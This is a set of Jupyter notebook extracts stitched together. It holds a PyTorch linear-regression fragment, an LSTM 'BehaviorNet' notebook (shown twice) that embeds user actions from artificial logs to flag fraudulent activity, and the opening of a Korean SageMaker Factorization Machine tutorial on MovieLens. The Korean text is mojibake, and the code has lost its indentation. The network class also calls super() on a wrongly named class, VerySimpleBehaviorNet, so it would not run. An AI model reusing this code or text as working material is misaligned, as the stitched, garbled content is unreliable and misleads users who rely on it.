# Define data loader
batch_size = 5
train_dl = DataLoader(train_ds, batch_size, shuffle=True)
for xb, yb in train_dl:
print(xb)
print(yb)
break
# Define model
model = nn.Linear(3, 2)
print(model.weight)
print(model.bias)
# Parameters
list(model.parameters())
# Generate predictions
preds = model(inputs)
preds
# Import nn.functional
import torch.nn.functional as F
# Define loss function
loss_fn = F.mse_loss
loss = loss_fn(model(inputs), targets)
print(loss)
# Define optimizer
opt = torch.optim.SGD(model.parameters(), lr=1e-5)
from tqdm import tqdm
# Utility function to train the model
def fit(num_epochs, model, loss_fn, opt, train_dl):
# Repeat for given number of epochs
for epoch in tqdm(range(num_epochs)):
# Train with batches of data
for xb,yb in train_dl:
# 1. Generate predictions
pred = model(xb)
# 2. Calculate loss
loss = loss_fn(pred, yb)
# 3. Compute gradients
loss.backward()
# 4. Update parameters using gradients
opt.step()
# 5. Reset the gradients to zero
opt.zero_grad()
# Print the progress
if (epoch+1) % 10 == 0:
print(' | Epoch [{}/{}], Loss: {:.4f}'.format(epoch+1, num_epochs, loss.item()))
fit(100, model, loss_fn, opt, train_dl)
# Generate predictions
preds = model(inputs)
preds
# Compare with targets
targets
model(torch.tensor([[75, 63, 44.]]))
| 0.734786 | 0.846641 |
```
import os
import numpy as np
import pandas as pd
import torch as t
from torch import nn
```
# BehaviorNet in PyTorch
Using a simple LSTM network to learn activities representations (activity embedding analog to a word embedding in a language model).
```
device = t.device('cpu')
```
## Load and prepare the artifical logfiles
```
%%bash
ls -lisa ./Data
logfile = pd.read_pickle('./Data/logfile.pkl')
id2action = np.load('./Data/id2action.npy')
action2id = {a : i for i,a in enumerate(id2action)}
logfile['SessionActivityInt'] = logfile.SessionActivity.map(lambda ls: np.array([action2id[a] for a in ls]+[action2id['start']]))
logfile.head()
```
## Network Design
```
class BehaviourNet(nn.Module):
'''
Very simple network consisting of an embedding layer, LSTM layers and a decoder with dropouts
'''
def __init__(self, n_actions=6, embedding_size=3, n_nodes=6, n_layers=2, dropout=0.2,
padding_idx=0, initrange=0.5):
super(VerySimpleBehaviorNet, self).__init__()
self.dropout = nn.Dropout(dropout)
self.embedding = nn.Embedding(n_actions, embedding_size, padding_idx)
self.rnn = nn.LSTM(embedding_size, n_nodes, n_layers, dropout=dropout)
self.decoder = nn.Linear(n_nodes, n_actions)
self.init_weights(initrange)
self.n_nodes = n_nodes
self.n_layers = n_layers
def init_weights(self, initrange=0.1):
self.embedding.weight.data.uniform_(-initrange, initrange)
# Set the first row to zero (padding idx)
self.embedding.weight.data[0,:] = 0
print(self.embedding.weight)
self.decoder.bias.data.zero_()
self.decoder.weight.data.uniform_(-initrange, initrange)
def init_hidden(self, batch_size):
weight = next(self.parameters())
return (weight.new_zeros(self.n_layers, batch_size, self.n_nodes),
weight.new_zeros(self.n_layers, batch_size, self.n_nodes))
def forward(self, input, hidden):
emb = self.dropout(self.embedding(input))
output, hidden = self.rnn(emb, hidden)
output = self.dropout(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
return decoded.view(output.size(0), output.size(1), decoded.size(1)), hidden
def get_batch(i, batch_size, input):
'''
Takes a column/list of activity tensors of variable lenght
and returns the padded i-th minibatch of batch_size activities
'''
data = input[i*batch_size : (i+1) * batch_size]
data = sorted(data, key=len, reverse=True)
x = nn.utils.rnn.pad_sequence([x[:-1] for x in data])
y = nn.utils.rnn.pad_sequence([y[1:] for y in data])
return x, y
def split_train_test(input, device, prop=0.8, seed=42):
np.random.seed(42)
mask = np.random.uniform(size=input.shape[0])<=prop
train = input[mask]
test = input[~mask]
train = [t.LongTensor(a).to(device) for a in train]
test = [t.LongTensor(a).to(device) for a in test]
return train, test, input[mask].index, input[~mask].index
train, test, train_idx, test_idx = split_train_test(logfile.SessionActivityInt, device)
get_batch(0, 2, train)
def training(model, optimizer, scheduler, loss_function, data, batch_size, n_actions, clipping=0.5):
model.train()
n_batch = int(np.ceil(len(data) // batch_size))
hidden = model.init_hidden(batch_size)
scheduler.step()
total_loss = 0.0
for batch in range(n_batch):
hidden = tuple(h.detach() for h in hidden)
x,y = get_batch(batch, batch_size, data)
optimizer.zero_grad()
output, hidden = model(x, hidden)
output_flatten = output.view(-1, n_actions)
y_flatten = y.view(-1)
loss = loss_function(output_flatten, y_flatten)
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), clipping)
optimizer.step()
total_loss += loss
return total_loss / n_batch
def evaluate(model, loss_function, data, n_actions):
model.eval()
batch_size = len(data)
hidden = model.init_hidden(batch_size)
x,y = get_batch(0, batch_size, data)
output, hidden = model(x, hidden)
output_flatten = output.view(-1, n_actions)
y_flatten = y.view(-1)
loss = loss_function(output_flatten, y_flatten)
y_probs = nn.Softmax()(output)
y_predict = t.argmax(output, 2)
y_predict[y==0]=0
acc = (y_predict==y).double()[y>0].sum() / y[y>0].size(0)
return y_probs, y_predict, y, loss, acc
```
## Training
```
modelname = 'model_1'
model = BehaviourNet(initrange=10, n_layers=2, n_nodes=20, n_actions=len(id2action)).to(device)
loss_func = nn.CrossEntropyLoss(ignore_index=0)
optimizer = t.optim.RMSprop(model.parameters(), lr=0.05)
scheduler = t.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.5)
for epoch in range(20):
training_loss = training(model, optimizer, scheduler, loss_func, train, 100, n_actions=len(id2action))
y_prob, y_pred, y_true, test_loss, test_acc = evaluate(model, loss_func, test, n_actions=len(id2action))
print(f'Epoch {epoch}\nTrain Loss : {training_loss} \t Val loss: {test_loss} \t Val Acc {test_acc}')
```
## Save the model
```
try:
os.mkdir('./models')
except Exception as e:
print('Model dir already exists')
model_state_dict = model.state_dict()
optimizer_state_dict = optimizer.state_dict()
t.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': training_loss,
}, f'./models/{modelname}')
model_state_dict
```
## Use Embedding to detect anomalies
```
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
%matplotlib inline
embeddings = model.embedding.weight.data.cpu().numpy()
fig = plt.figure(figsize=(12,8))
ax = fig.add_subplot(111, projection='3d')
for i in range(1, len(action2id)):
ax.scatter(embeddings[i,0], embeddings[i,1], embeddings[i,2], s=25)
ax.text(embeddings[i,0]+0.2, embeddings[i,1]+0.2, embeddings[i,2], s=id2action[i], fontsize=14)
ax.grid(True)
ax.set_title('Action Embedding (latent space)')
plt.savefig('action_embeddings.png', dpi=500)
logfile['Embedded_Activities'] = logfile.SessionActivityInt.map(lambda x: embeddings[x].mean(axis=0))
logfile['Embedded_Activities_x'] = logfile.Embedded_Activities.map(lambda x: x[0])
logfile['Embedded_Activities_y'] = logfile.Embedded_Activities.map(lambda x: x[1])
logfile['Embedded_Activities_z'] = logfile.Embedded_Activities.map(lambda x: x[2])
fig = plt.figure(figsize=(16,8))
ax = fig.add_subplot(111, projection='3d')
plt.title('Activity profiles')
for i in range(1, len(action2id)):
ax.scatter(logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_x'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_y'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_z'], color='green')
ax.scatter(logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_x'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_y'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_z'], color='blue')
ax.scatter(logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_x'],
logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_y'],
logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_z'], color='red')
ax.grid(True)
plt.savefig('activityprofiles.png', dpi=500)
user_profiles = logfile.groupby(['UserID', 'UserRole', 'PotentialFraudster'], as_index=False).agg({
'Embedded_Activities_x':np.mean,
'Embedded_Activities_y':np.mean,
'Embedded_Activities_z':np.mean,
})
fig = plt.figure(figsize=(16,8))
ax = fig.add_subplot(111, projection='3d')
plt.title('User profiles')
for i in range(1, len(action2id)):
ax.scatter(user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_x'],
user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_y'],
user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_z'], color='green')
ax.scatter(user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_x'],
user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_y'],
user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_z'], color='blue')
ax.scatter(user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_x'],
user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_y'],
user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_z'], color='red')
ax.grid(True)
plt.savefig('userprofiles.png', dpi=500)
```
|
github_jupyter
|
import os
import numpy as np
import pandas as pd
import torch as t
from torch import nn
device = t.device('cpu')
%%bash
ls -lisa ./Data
logfile = pd.read_pickle('./Data/logfile.pkl')
id2action = np.load('./Data/id2action.npy')
action2id = {a : i for i,a in enumerate(id2action)}
logfile['SessionActivityInt'] = logfile.SessionActivity.map(lambda ls: np.array([action2id[a] for a in ls]+[action2id['start']]))
logfile.head()
class BehaviourNet(nn.Module):
'''
Very simple network consisting of an embedding layer, LSTM layers and a decoder with dropouts
'''
def __init__(self, n_actions=6, embedding_size=3, n_nodes=6, n_layers=2, dropout=0.2,
padding_idx=0, initrange=0.5):
super(VerySimpleBehaviorNet, self).__init__()
self.dropout = nn.Dropout(dropout)
self.embedding = nn.Embedding(n_actions, embedding_size, padding_idx)
self.rnn = nn.LSTM(embedding_size, n_nodes, n_layers, dropout=dropout)
self.decoder = nn.Linear(n_nodes, n_actions)
self.init_weights(initrange)
self.n_nodes = n_nodes
self.n_layers = n_layers
def init_weights(self, initrange=0.1):
self.embedding.weight.data.uniform_(-initrange, initrange)
# Set the first row to zero (padding idx)
self.embedding.weight.data[0,:] = 0
print(self.embedding.weight)
self.decoder.bias.data.zero_()
self.decoder.weight.data.uniform_(-initrange, initrange)
def init_hidden(self, batch_size):
weight = next(self.parameters())
return (weight.new_zeros(self.n_layers, batch_size, self.n_nodes),
weight.new_zeros(self.n_layers, batch_size, self.n_nodes))
def forward(self, input, hidden):
emb = self.dropout(self.embedding(input))
output, hidden = self.rnn(emb, hidden)
output = self.dropout(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
return decoded.view(output.size(0), output.size(1), decoded.size(1)), hidden
def get_batch(i, batch_size, input):
'''
Takes a column/list of activity tensors of variable lenght
and returns the padded i-th minibatch of batch_size activities
'''
data = input[i*batch_size : (i+1) * batch_size]
data = sorted(data, key=len, reverse=True)
x = nn.utils.rnn.pad_sequence([x[:-1] for x in data])
y = nn.utils.rnn.pad_sequence([y[1:] for y in data])
return x, y
def split_train_test(input, device, prop=0.8, seed=42):
np.random.seed(42)
mask = np.random.uniform(size=input.shape[0])<=prop
train = input[mask]
test = input[~mask]
train = [t.LongTensor(a).to(device) for a in train]
test = [t.LongTensor(a).to(device) for a in test]
return train, test, input[mask].index, input[~mask].index
train, test, train_idx, test_idx = split_train_test(logfile.SessionActivityInt, device)
get_batch(0, 2, train)
def training(model, optimizer, scheduler, loss_function, data, batch_size, n_actions, clipping=0.5):
model.train()
n_batch = int(np.ceil(len(data) // batch_size))
hidden = model.init_hidden(batch_size)
scheduler.step()
total_loss = 0.0
for batch in range(n_batch):
hidden = tuple(h.detach() for h in hidden)
x,y = get_batch(batch, batch_size, data)
optimizer.zero_grad()
output, hidden = model(x, hidden)
output_flatten = output.view(-1, n_actions)
y_flatten = y.view(-1)
loss = loss_function(output_flatten, y_flatten)
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), clipping)
optimizer.step()
total_loss += loss
return total_loss / n_batch
def evaluate(model, loss_function, data, n_actions):
model.eval()
batch_size = len(data)
hidden = model.init_hidden(batch_size)
x,y = get_batch(0, batch_size, data)
output, hidden = model(x, hidden)
output_flatten = output.view(-1, n_actions)
y_flatten = y.view(-1)
loss = loss_function(output_flatten, y_flatten)
y_probs = nn.Softmax()(output)
y_predict = t.argmax(output, 2)
y_predict[y==0]=0
acc = (y_predict==y).double()[y>0].sum() / y[y>0].size(0)
return y_probs, y_predict, y, loss, acc
modelname = 'model_1'
model = BehaviourNet(initrange=10, n_layers=2, n_nodes=20, n_actions=len(id2action)).to(device)
loss_func = nn.CrossEntropyLoss(ignore_index=0)
optimizer = t.optim.RMSprop(model.parameters(), lr=0.05)
scheduler = t.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.5)
for epoch in range(20):
training_loss = training(model, optimizer, scheduler, loss_func, train, 100, n_actions=len(id2action))
y_prob, y_pred, y_true, test_loss, test_acc = evaluate(model, loss_func, test, n_actions=len(id2action))
print(f'Epoch {epoch}\nTrain Loss : {training_loss} \t Val loss: {test_loss} \t Val Acc {test_acc}')
try:
os.mkdir('./models')
except Exception as e:
print('Model dir already exists')
model_state_dict = model.state_dict()
optimizer_state_dict = optimizer.state_dict()
t.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': training_loss,
}, f'./models/{modelname}')
model_state_dict
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
%matplotlib inline
embeddings = model.embedding.weight.data.cpu().numpy()
fig = plt.figure(figsize=(12,8))
ax = fig.add_subplot(111, projection='3d')
for i in range(1, len(action2id)):
ax.scatter(embeddings[i,0], embeddings[i,1], embeddings[i,2], s=25)
ax.text(embeddings[i,0]+0.2, embeddings[i,1]+0.2, embeddings[i,2], s=id2action[i], fontsize=14)
ax.grid(True)
ax.set_title('Action Embedding (latent space)')
plt.savefig('action_embeddings.png', dpi=500)
logfile['Embedded_Activities'] = logfile.SessionActivityInt.map(lambda x: embeddings[x].mean(axis=0))
logfile['Embedded_Activities_x'] = logfile.Embedded_Activities.map(lambda x: x[0])
logfile['Embedded_Activities_y'] = logfile.Embedded_Activities.map(lambda x: x[1])
logfile['Embedded_Activities_z'] = logfile.Embedded_Activities.map(lambda x: x[2])
fig = plt.figure(figsize=(16,8))
ax = fig.add_subplot(111, projection='3d')
plt.title('Activity profiles')
for i in range(1, len(action2id)):
ax.scatter(logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_x'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_y'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==0), 'Embedded_Activities_z'], color='green')
ax.scatter(logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_x'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_y'],
logfile.loc[(logfile.FraudulentActivity==0) & (logfile.UserRole==1), 'Embedded_Activities_z'], color='blue')
ax.scatter(logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_x'],
logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_y'],
logfile.loc[logfile.FraudulentActivity==1, 'Embedded_Activities_z'], color='red')
ax.grid(True)
plt.savefig('activityprofiles.png', dpi=500)
user_profiles = logfile.groupby(['UserID', 'UserRole', 'PotentialFraudster'], as_index=False).agg({
'Embedded_Activities_x':np.mean,
'Embedded_Activities_y':np.mean,
'Embedded_Activities_z':np.mean,
})
fig = plt.figure(figsize=(16,8))
ax = fig.add_subplot(111, projection='3d')
plt.title('User profiles')
for i in range(1, len(action2id)):
ax.scatter(user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_x'],
user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_y'],
user_profiles.loc[(user_profiles.UserRole==0) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_z'], color='green')
ax.scatter(user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_x'],
user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_y'],
user_profiles.loc[(user_profiles.UserRole==1) & (user_profiles.PotentialFraudster==0), 'Embedded_Activities_z'], color='blue')
ax.scatter(user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_x'],
user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_y'],
user_profiles.loc[user_profiles.PotentialFraudster==1, 'Embedded_Activities_z'], color='red')
ax.grid(True)
plt.savefig('userprofiles.png', dpi=500)
| 0.692434 | 0.801975 |
# SageMaker Factorization Machine(FM)์ผ๋ก ์ถ์ฒ ์์คํ
๊ตฌ์ถํ๊ธฐ
*๋ณธ ๋
ธํธ๋ถ ์์ ๋ AWS ๋จธ์ ๋ฌ๋ ๋ธ๋ก๊ทธ์ ๊ธฐ๊ณ ๋ ๊ธ๋ค์ ๊ธฐ๋ฐํ์ฌ SageMaker์ Factorization Machine(FM)์ผ๋ก ์ถ์ฒ ์์คํ
์ ๊ตฌ์ถํ๋ ๋ฐฉ๋ฒ์ ์ค๋ช
ํฉ๋๋ค.*
References
- [Build a movie recommender with factorization machines on Amazon SageMaker](https://aws.amazon.com/ko/blogs/machine-learning/build-a-movie-recommender-with-factorization-machines-on-amazon-sagemaker/)
- [Amazon SageMaker Factorization Machines ์๊ณ ๋ฆฌ์ฆ์ ํ์ฅํ์ฌ ์ถ์ฒ ์์คํ
๊ตฌํํ๊ธฐ](https://aws.amazon.com/ko/blogs/korea/extending-amazon-sagemaker-factorization-machines-algorithm-to-predict-top-x-recommendations/)
- [Factorization Machine ๋
ผ๋ฌธ](https://www.csie.ntu.edu.tw/~b97053/paper/Rendle2010FM.pdf)
## 1. Factorization Machine
---
### ๊ฐ์
์ผ๋ฐ์ ์ธ ์ถ์ฒ ๋ฌธ์ ๋ค์ user๊ฐ ํ, item์ด ์ด, rating์ด ๊ฐ์ผ๋ก ์ด๋ฃจ์ด์ง ํ๋ ฌ์ ๋ฐ์ดํฐ์
์ผ๋ก ํ์ฌ Matrix Factorization ๊ธฐ๋ฒ์ ํ์ฉํ๋๋ฐ, real-world์ ๋ค์ํ ๋ฉํ๋ฐ์ดํฐ ํผ์ฒ(feature)๋ค์ ๊ทธ๋๋ก ์ ์ฉํ๊ธฐ์๋ ์ด๋ ค์์ด ์์ต๋๋ค. Factoriztion Machine(์ดํ FM) ์๊ณ ๋ฆฌ์ฆ์ Matrix Factorization์ ๊ฐ๋
์ ํ์ฅํ์ฌ ๋ฉํ๋ฐ์ดํฐ ํผ์ฒ๋ค์ ๊ฐ์ด ๊ณ ๋ คํ๊ณ ํผ์ฒ ๊ฐ์ ์ํธ ๊ด๊ณ(interaction)๋ฅผ ์ ํ ๊ณ์ฐ ๋ณต์ก๋๋ก ์๋์ผ๋ก ๋ชจ๋ธ๋งํ ์ ์๊ธฐ์, ํผ์ฒ ์์ง๋์ด๋ง์ ๋ค์ด๊ฐ๋ ๋
ธ๋ ฅ์ ํฌ๊ฒ ์ค์ผ ์ ์์ต๋๋ค.
### ์ค๋ช
๋ค์ํ ๋ฉํ๋ฐ์ดํฐ ํผ์ฒ๋ฅผ ๊ณ ๋ คํ๊ธฐ ์ํด ์๋ ๊ทธ๋ฆผ์ฒ๋ผ user์ item์ ์-ํซ ์ธ์ฝ๋ฉ์ผ๋ก ๋ณํํ๊ณ ์ถ๊ฐ ํผ์ฒ๋ค์ ๊ทธ๋๋ก concatenateํ์ฌ `f(user, item, additional features) = rating` ํํ์ ์ ํ ํ๊ท(Linear Regression) ๋ฌธ์ ๋ก ๋ณํํ์ฌ ํ ์ ์์ต๋๋ค.

ํ์ง๋ง, ์ถ์ฒ ๋ฌธ์ ๋ฅผ ์ ํ ํ๊ท๋ก๋ง ํ๋ ค๊ณ ํ๋ฉด ํผ์ฒ ๊ฐ์ ์ํธ ๊ด๊ณ๋ฅผ ๊ณ ๋ คํ ์ ์๊ธฐ์ ์๋ ์์์ฒ๋ผ ํผ์ฒ ๊ฐ์ ์ํธ ๊ด๊ณ๋ฅผ ๋ชจ๋ธ๋งํ๋ ํญ์ ์ถ๊ฐํ์ฌ ๋คํญ ํ๊ท(Polynomial Regression)๋ก ๋ณํํด์ผ ํฉ๋๋ค.
$$
\begin{align} \hat{y}(\mathbf{x}) = w_{0} + \sum_{i=1}^{d} w_{i} x_{i} + \sum_{i=1}^d \sum_{j=i+1}^d x_{i} x_{j} w_{ij}, \;\; x \in \mathbb{R}^d \tag {1}
\end{align}
$$
$d$๋ ํผ์ฒ ๊ฐฏ์๋ก, $x \in \mathbb{R}^d$๋ ๋จ์ผ ์ํ์ ํผ์ฒ ๋ฒกํฐ๋ฅผ ๋ํ๋
๋๋ค.
ํ์ง๋ง ๋๋ถ๋ถ์ ์ถ์ฒ ์์คํ
๋ฐ์ดํฐ์
์ ํฌ์ํ๊ธฐ์(sparse) cold-start ๋ฌธ์ ๊ฐ ์์ผ๋ฉฐ, ์ถ๊ฐ์ ์ผ๋ก ๊ณ ๋ คํด์ผ ํ๋ ํผ์ฒ๋ค์ด ๋ง์์ง ์๋ก ๊ณ์ฐ์ด ๋งค์ฐ ๋ณต์กํด์ง๋๋ค. (์: user๊ฐ 6๋ง๋ช
, item ๊ฐฏ์๊ฐ 5์ฒ๊ฐ, ์ถ๊ฐ ํผ์ฒ๊ฐ 5์ฒ๊ฐ์ผ ๊ฒฝ์ฐ 70,000x70,000 ํ๋ ฌ์ ์์ธกํด์ผ ํฉ๋๋ค.)
FM์ ์ด๋ฌํ ๋ฌธ์ ๋ค์ ํ๋ ฌ ๋ถํด ๊ธฐ๋ฒ์ ํ์ฉํ์ฌ feature ์(์: user, item) ๊ฐ์ ์ํธ ๊ด๊ณ๋ฅผ ๋ด์ (dot product)์ผ๋ก ๋ณํํ๊ณ
์์์ ์ฌ๊ตฌ์ฑํ์ฌ ๊ณ์ฐ ๋ณต์ก๋๋ฅผ $O(kd^2)$์์ $O(kd)$๋ก ๊ฐ์์์ผฐ์ต๋๋ค. (์์ (2)์์ ์ถ๊ฐ์ ์ธ ๊ณ์ฐ์ ๊ฑฐ์น๋ฉด ๊ณ์ฐ ๋ณต์ก๋๋ฅผ ์ ํ์ผ๋ก ๊ฐ์ํ ์ ์์ต๋๋ค. ์์ธํ ๋ด์ฉ์ ๋
ผ๋ฌธ์ ์ฐธ์กฐํ์ธ์.)
$$
\begin{align}
\hat{y}(\mathbf{x}) = w_{0} + \sum_{i=1}^{d} w_i x_i + \sum_{i=1}^d\sum_{j=i+1}^d x_{i} x_{j} \langle\mathbf{v}_i, \mathbf{v}_j\rangle \tag{2}
\end{align}
$$
$$
\begin{align}
\langle \textbf{v}_i , \textbf{v}_{j} \rangle = \sum_{f=1}^k v_{i,f} v_{j,f},\; k: \text{dimension of latent feature} \tag{3}
\end{align}
$$
์์ ๋ชจ๋ธ์ 2-way(degree = 2) FM์ด๋ผ๊ณ ํ๋ฉฐ, ์ด๋ฅผ ์ผ๋ฐํํ d-way FM๋ ์์ง๋ง, ๋ณดํต 2-way FM๋ฅผ ๋ง์ด ์ฌ์ฉํฉ๋๋ค. SageMaker์ FM ๋ํ 2-way FM์
๋๋ค.
FM์ด ํ๋ จํ๋ ํ๋ผ๋ฉํฐ ํํ์ ($w_{0}, \mathbf{w}, \mathbf{V}$) ์ด๋ฉฐ, ์๋ฏธ๋ ์๋์ ๊ฐ์ต๋๋ค.
- $w_{0} \in \mathbb{R}$: global bias
- $\mathbf{w} \in \mathbb{R}^d$: ํผ์ฒ ๋ฒกํฐ $\mathbf{x}_i$์ ๊ฐ์ค์น
- $\mathbf{V} \in \mathbb{R}^{n \times k}$: ํผ์ฒ ์๋ฒ ๋ฉ ํ๋ ฌ๋ก i๋ฒ์งธ ํ์ $\mathbf{v}_i$
FM์ ์์ ์์์์ ์ ์ ์๋ฏ์ด closed form์ด๋ฉฐ ์๊ฐ ๋ณต์ก๋๊ฐ ์ ํ์ด๊ธฐ ๋๋ฌธ์, ๋ค์์ user & item๊ณผ ๋ฉํ๋ฐ์ดํฐ๋ค์ด ๋ง์ ์ถ์ฒ ๋ฌธ์ ์ ์ ํฉํฉ๋๋ค.
ํ๋ จ ๋ฐฉ๋ฒ์ ๋ํ์ ์ผ๋ก Gradient Descent, ALS(Alternating Least Square), MCMC(Markov Chain Monte Carlo)๊ฐ ์์ผ๋ฉฐ, AWS์์๋ ์ด ์ค ๋ฅ๋ฌ๋ ์ํคํ
์ฒ์ ๊ธฐ๋ฐํ Gradient Descent๋ฅผ MXNet ํ๋ ์์ํฌ๋ฅผ ์ด์ฉํ์ฌ ํ๋ จํฉ๋๋ค.
## 2. MovieLens ๋ฐ์ดํฐ์
์ผ๋ก FM ๋ชจ๋ธ ํ๋ จ ๋ฐ ๋ฐฐํฌํ๊ธฐ
---
๋ฅ๋ฌ๋์ Hello World๊ฐ MNIST ๋ฐ์ดํฐ์
์ด๋ผ๋ฉด, ์ถ์ฒ ์์คํ
์ Hello World๋ MovieLens ๋ฐ์ดํฐ์
์
๋๋ค.
์ด ๋ฐ์ดํฐ์
์ ์ฌ๋ฌ ํฌ๊ธฐ๋ก ์ ๊ณต๋๋ฉฐ, ๋ณธ ์์ ์์๋ 943๋ช
์ ์ฌ์ฉ์์ 1,682๊ฐ์ ์ํ์ ๋ํด 10๋ง๊ฐ์ ๋ฑ๊ธ์ด ๋ถ์ฌ๋ ml100k๋ฅผ ์ฌ์ฉํฉ๋๋ค.
```
import sagemaker
import sagemaker.amazon.common as smac
from sagemaker import get_execution_role
from sagemaker.predictor import json_deserializer
from sagemaker.amazon.amazon_estimator import get_image_uri
import numpy as np
from scipy.sparse import lil_matrix
import pandas as pd
import boto3, io, os, csv, json
```
### MovieLens ๋ฐ์ดํฐ์
๋ค์ด๋ก๋
```
!wget http://files.grouplens.org/datasets/movielens/ml-100k.zip
!unzip -o ml-100k.zip
```
### ๋ฐ์ดํฐ ์
ํ๋ง
```
!shuf ml-100k/ua.base -o ml-100k/ua.base.shuffled
```
### ํ๋ จ ๋ฐ์ดํฐ ๋ก๋
```
user_movie_ratings_train = pd.read_csv('ml-100k/ua.base.shuffled', sep='\t', index_col=False,
names=['user_id' , 'movie_id' , 'rating'])
user_movie_ratings_train.head(5)
```
### ํ
์คํธ ๋ฐ์ดํฐ ๋ก๋
```
user_movie_ratings_test = pd.read_csv('ml-100k/ua.test', sep='\t', index_col=False,
names=['user_id' , 'movie_id' , 'rating'])
user_movie_ratings_test.head(5)
```
10๋ง๊ฑด์ ๋ฑ๊ธ ๋ฐ์ดํฐ๊ฐ ์ ํฌ์ํ์ง ๊ถ๊ธํ์ค ์ ์์ต๋๋ค. 943๋ช
์ ์ฌ์ฉ์์ 1682๊ฐ์ ์ํ๋ฅผ ๋ชจ๋ ๊ณ ๋ คํ๋ฉด ๊ฐ๋ฅํ rating์ ์ด ๊ฐ์๋
943 * 1,682 = 1,586,126๊ฐ๋ก ์ด ์ค 6.3%์ ๋ฑ๊ธ๋ง ๋ณด์ ํ๊ฒ ๋ฉ๋๋ค.
```
nb_users = user_movie_ratings_train['user_id'].max()
nb_movies = user_movie_ratings_train['movie_id'].max()
nb_features = nb_users + nb_movies
total_ratings = nb_users * nb_movies
nb_ratings_test = len(user_movie_ratings_test.index)
nb_ratings_train = len(user_movie_ratings_train.index)
print("# of users: {}".format(nb_users))
print("# of movies: {}".format(nb_movies))
print("Training Count: {}".format(nb_ratings_train))
print("Test Count: {}".format(nb_ratings_test))
print("Features (# of users + # of movies): {}".format(nb_features))
print("Sparsity: {}%".format(((nb_ratings_test+nb_ratings_train)/total_ratings)*100))
```
### ์-ํซ ์ธ์ฝ๋ฉ ํฌ์ ํ๋ ฌ ๋ณํ
FM์ ์
๋ ฅ ๋ฐ์ดํฐ ํฌ๋งท์ธ ์-ํซ ์ธ์ฝ๋ฉ ํฌ์ ํ๋ ฌ๋ก ๋ณํํ๊ฒ ์ต๋๋ค. ๋ฌผ๋ก ํฌ์ ํ๋ ฌ์ด ์๋ ๋ฐ์ง(dense) ํ๋ ฌ๋ ๊ฐ๋ฅํ์ง๋ง, ๋ฐ์ดํฐ๊ฐ ๋ง์์ง์๋ก ๊ณ์ฐ ์๋๊ฐ ๋๋ ค์ง๋ฏ๋ก, ํฌ์ ํ๋ ฌ์ ์ถ์ฒํฉ๋๋ค.
์ฐธ๊ณ ๋ก, MovieLens ๋ฐ์ดํฐ์
์ ๋ณ๋์ ๋ฉํ๋ฐ์ดํฐ ํผ์ฒ๊ฐ ์กด์ฌํ์ง ์์ 943๋ช
์ ์ฌ์ฉ์์ 1,682๊ฐ ์ํ์ ๋ํด์๋ง ์-ํซ ์ธ์ฝ๋ฉ ๋ณํ์ ์ํํ๋ฏ๋ก ๋ณํ ํ ํผ์ฒ์ ์ฐจ์์ 943+1,682=2,625์
๋๋ค.
